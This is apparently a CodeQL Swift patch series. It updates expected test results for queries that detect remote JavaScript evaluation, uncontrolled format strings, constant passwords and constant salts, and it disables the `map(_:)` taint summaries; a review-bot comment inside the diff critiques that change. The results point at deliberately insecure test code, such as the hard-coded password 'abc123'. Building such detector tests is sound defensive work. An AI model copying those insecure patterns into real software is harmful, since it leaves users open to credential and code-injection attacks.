@@ -114,30 +97,24 @@ subpaths | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. 
| | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. 
| | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. 
| | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. 
| | UnsafeJsEval.swift:320:44:320:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:318:24:318:87 | call to String.init(contentsOf:) | UnsafeJsEval.swift:320:44:320:74 | ... .+(_:_:) ... | Evaluation of uncontrolled JavaScript from a remote source. | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index 43a8b08c7ea..94dd27a82c2 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -18,8 +18,6 @@ edges | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | provenance | | -| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:120:26:120:26 | tainted | provenance | | -| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:124:27:124:27 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:37:135:37 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:139:5:139:5 | tainted | provenance | | 
@@ -30,14 +28,6 @@ edges | UncontrolledFormatString.swift:111:50:111:50 | tainted | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:112:64:112:64 | tainted | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:77:12:77:22 | format | provenance | | -| UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | UncontrolledFormatString.swift:122:24:122:24 | taintedSan | provenance | | -| UncontrolledFormatString.swift:120:26:120:26 | tainted | UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | provenance | | -| UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | provenance | | -| UncontrolledFormatString.swift:124:27:124:27 | tainted | UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | provenance | | -| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | provenance | | -| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | provenance | | -| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | provenance | | -| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | provenance | | | UncontrolledFormatString.swift:135:37:135:37 | tainted | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:139:5:139:5 | tainted | UncontrolledFormatString.swift:140:9:140:9 | cstr [Collection element] | provenance | 
| | UncontrolledFormatString.swift:140:9:140:9 | cstr [Collection element] | UncontrolledFormatString.swift:141:24:141:24 | cstr | provenance | | @@ -70,15 +60,6 @@ nodes | UncontrolledFormatString.swift:116:11:116:11 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:116:11:116:11 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:118:61:118:61 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| UncontrolledFormatString.swift:120:26:120:26 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:122:24:122:24 | taintedSan | semmle.label | taintedSan | -| UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| UncontrolledFormatString.swift:124:27:124:27 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | semmle.label | call to String.init(_:) [Collection element] | -| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | semmle.label | taintedVal2 | -| UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | semmle.label | taintedSan2 | | UncontrolledFormatString.swift:130:39:130:39 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | semmle.label | call to NSString.init(string:) | | UncontrolledFormatString.swift:135:37:135:37 | tainted | semmle.label | tainted | 
@@ -107,8 +88,6 @@ subpaths | UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:122:24:122:24 | taintedSan | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:122:24:122:24 | taintedSan | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | From 8245e6c2b971b4ab2a29fe7720d90ee82797bfd1 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 17:51:47 +0000 Subject: [PATCH 0703/1267] Swift: Fix unwanted flows. --- .../frameworks/StandardLibrary/Collection.qll | 4 +- .../CWE-259/ConstantPassword.expected | 25 ------- .../Security/CWE-760/ConstantSalt.expected | 67 ------------------- 3 files changed, 2 insertions(+), 94 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index 2d1c83d0c81..967eeec1432 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll 
@@ -32,8 +32,8 @@ private class CollectionSummaries extends SummaryModelCsv {
 ";Collection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
 ";Collection;true;flatMap(_:);;;Argument[-1];ReturnValue;taint",
 ";Collection;true;flatMap(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
- ";Collection;true;map(_:);;;Argument[-1];ReturnValue;taint",
- ";Collection;true;map(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
+ //";Collection;true;map(_:);;;Argument[-1];ReturnValue;taint", --- disabled due to dubious results in practice
+ //";Collection;true;map(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", --- disabled due to dubious results in practice
 ";Collection;true;split(maxSplits:omittingEmptySubsequences:whereSeparator:);;;Argument[-1];ReturnValue;taint",
 ";Collection;true;split(separator:maxSplits:omittingEmptySubsequences:);;;Argument[-1];ReturnValue;taint",
 ";Collection;true;removeFirst();;;Argument[-1];ReturnValue;taint",
diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected
index 640286de0ca..0c1e98bfe7c 100644
--- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected
+++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected
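Review bot: The two `map(_:)` rows are disabled by commenting them out with a trailing `--- disabled due to dubious results in practice`, which leaves dead model rows in the list and does not say what was wrong with them. Judging by the expected-file changes in this commit, the receiver-to-result flow ignored the closure, so a constant receiver whose elements the closure replaces (the getARandomPassword() and getARandomString() helpers in rncryptor.swift) was reported as a constant password or salt; I would delete the rows and record that in one comment, e.g. `// map(_:) has no receiver-to-result summary: the closure may return values unrelated to its input`. Dropping the rows presumably also removes taint through closures that do forward their element, so queries with remote sources may now miss results, and no test in view pins that case. A closure-aware model (collection element into the closure parameter, closure return value into the result elements) would keep those flows without the false positives, if the Swift summaries can express it. The enclosing CollectionSummaries class starts and ends outside the hunk.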
@@ -1,17 +1,4 @@ edges -| rncryptor.swift:60:9:60:65 | call to String.init(_:) | rncryptor.swift:68:25:68:44 | call to getARandomPassword() | provenance | | -| rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | provenance | | -| rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:60:16:60:64 | call to map(_:) | provenance | | -| rncryptor.swift:60:16:60:64 | call to map(_:) | rncryptor.swift:60:9:60:65 | call to String.init(_:) | provenance | | -| rncryptor.swift:60:16:60:64 | call to map(_:) | rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:74:89:74:89 | myRandomPassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:75:56:75:56 | myRandomPassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:81:56:81:56 | myMaybePassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:74:89:74:89 | myRandomPassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:75:56:75:56 | myRandomPassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:81:56:81:56 | myMaybePassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | 
myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | @@ -43,15 +30,7 @@ edges | test.swift:44:31:44:48 | call to getConstantArray() [Collection element] | test.swift:63:40:63:40 | constantStringPassword | provenance | | | test.swift:44:31:44:48 | call to getConstantArray() [Collection element] | test.swift:68:34:68:34 | constantStringPassword | provenance | | nodes -| rncryptor.swift:60:9:60:65 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | semmle.label | call to String.init(_:) [Collection element] | -| rncryptor.swift:60:16:60:16 | ............ | semmle.label | ............ | -| rncryptor.swift:60:16:60:64 | call to map(_:) | semmle.label | call to map(_:) | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | semmle.label | call to getARandomPassword() | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | semmle.label | call to getARandomPassword() [Collection element] | | rncryptor.swift:69:24:69:24 | abc123 | semmle.label | abc123 | -| rncryptor.swift:74:89:74:89 | myRandomPassword | semmle.label | myRandomPassword | -| rncryptor.swift:75:56:75:56 | myRandomPassword | semmle.label | myRandomPassword | | rncryptor.swift:77:89:77:89 | myConstPassword | semmle.label | myConstPassword | | rncryptor.swift:78:56:78:56 | myConstPassword | semmle.label | myConstPassword | | rncryptor.swift:80:89:80:89 | myMaybePassword | semmle.label | myMaybePassword | 
@@ -86,13 +65,9 @@ nodes | test.swift:68:34:68:34 | constantStringPassword | semmle.label | constantStringPassword | subpaths #select -| rncryptor.swift:74:89:74:89 | myRandomPassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:74:89:74:89 | myRandomPassword | The value '............' is used as a constant password. | -| rncryptor.swift:75:56:75:56 | myRandomPassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:75:56:75:56 | myRandomPassword | The value '............' is used as a constant password. | | rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:80:89:80:89 | myMaybePassword | The value '............' is used as a constant password. | | rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:81:56:81:56 | myMaybePassword | The value '............' is used as a constant password. | | rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. 
| | rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected index 93d06372be4..002454a3021 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected 
@@ -1,28 +1,4 @@ edges -| rncryptor.swift:47:9:47:69 | call to String.init(_:) | rncryptor.swift:57:27:57:44 | call to getARandomString() | provenance | | -| rncryptor.swift:47:9:47:69 | call to String.init(_:) | rncryptor.swift:58:27:58:44 | call to getARandomString() | provenance | | -| rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:47:16:47:68 | call to map(_:) | provenance | | -| rncryptor.swift:47:16:47:68 | call to map(_:) | rncryptor.swift:47:9:47:69 | call to String.init(_:) | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:62:57:62:57 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:67:106:67:106 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:69:106:69:106 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:70:106:70:106 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:72:106:72:106 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:74:127:74:127 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:76:127:76:127 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:77:135:77:135 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:79:135:79:135 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:27:57:44 | call to getARandomString() | rncryptor.swift:57:22:57:45 | call to Data.init(_:) | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:64:55:64:55 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:67:131:67:131 | myRandomSalt2 | provenance | | -| 
rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:68:133:68:133 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:70:131:70:131 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:71:133:71:133 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:74:152:74:152 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:75:154:75:154 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:77:160:77:160 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:78:162:78:162 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:27:58:44 | call to getARandomString() | rncryptor.swift:58:22:58:45 | call to Data.init(_:) | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:63:57:63:57 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:68:106:68:106 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:71:106:71:106 | myConstantSalt1 | provenance | | 
@@ -48,44 +24,19 @@ edges | test.swift:44:27:44:44 | call to getConstantArray() [Collection element] | test.swift:63:59:63:59 | constantStringSalt | provenance | | | test.swift:44:27:44:44 | call to getConstantArray() [Collection element] | test.swift:68:53:68:53 | constantStringSalt | provenance | | nodes -| rncryptor.swift:47:9:47:69 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| rncryptor.swift:47:16:47:16 | ................ | semmle.label | ................ | -| rncryptor.swift:47:16:47:68 | call to map(_:) | semmle.label | call to map(_:) | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | -| rncryptor.swift:57:27:57:44 | call to getARandomString() | semmle.label | call to getARandomString() | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | -| rncryptor.swift:58:27:58:44 | call to getARandomString() | semmle.label | call to getARandomString() | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | | rncryptor.swift:59:29:59:29 | abcdef123456 | semmle.label | abcdef123456 | | rncryptor.swift:60:24:60:30 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | | rncryptor.swift:60:29:60:29 | 0 | semmle.label | 0 | -| rncryptor.swift:62:57:62:57 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:63:57:63:57 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:64:55:64:55 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:65:55:65:55 | myConstantSalt2 | semmle.label | myConstantSalt2 | -| rncryptor.swift:67:106:67:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | -| rncryptor.swift:67:131:67:131 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:68:106:68:106 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:68:133:68:133 | myRandomSalt2 | semmle.label | myRandomSalt2 | -| rncryptor.swift:69:106:69:106 | 
